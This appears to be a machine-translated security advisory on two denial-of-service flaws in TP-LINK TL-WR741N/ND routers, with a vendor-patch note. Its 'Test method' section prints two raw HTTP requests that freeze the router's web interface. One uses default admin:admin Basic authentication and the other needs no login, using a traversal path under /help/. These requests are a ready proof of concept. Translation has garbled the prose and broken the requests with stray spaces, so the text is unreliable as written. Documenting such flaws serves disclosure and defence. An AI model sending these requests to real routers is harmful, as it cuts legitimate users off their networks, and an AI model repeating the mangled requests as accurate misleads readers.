Multiple Denial of Service Vulnerabilities in TP-LINK TL-WR741N/TL-WR741ND Routers
Release date:
Updated on:
Affected Systems:
TP-LINK TL-WR741N
TP-LINK TL-WR741ND
Description:
--------------------------------------------------------------------------------
Bugtraq id: 59325
TP-LINK TL-WR741N, TL-WR741ND is a Mbps wireless router.
TP-LINK TL-WR741N, TL-WR741ND has multiple denial-of-service vulnerabilities in implementation, one of which requires the identity of the attacker, the other without authentication, these vulnerabilities can cause remote freezing of the device, A valid user is denied.
<* Source: W1ckerMan
Link: http://packetstormsecurity.com/files/121359/tplink-freezedos.txt
Http://www.exploit-db.com/exploits/24504/
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
1-FREEZING TP-LINK web interface (You need to be autenticated)
// You need the line Authorization: Basic YWRtaW46YWRtaW4 =
// Maybe admin ????
GET http: // 192.168.1.1: 80/userRpm/DdnsAddRpm.htm? Provider = 4 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv: 14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: en-us, en; q = 0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http: // 192.168.1.1/userRpm/DdnsAddRpm.htm? Provider = 4
Authorization: Basic YWRtaW46YWRtaW4 =
2-FREEZING TP-LINK web interface (You don't need autentication)
GET http: // 192.168.1.1: 80/help/.../../root HTTP/1.1
Host: 192.168.178.2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: de-de, de; q = 0.8, en-us; q = 0.5, en; q = 0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http: // 192.168.1.1/help/
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
TP-LINK
-------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.tp-link.com/en/support/download/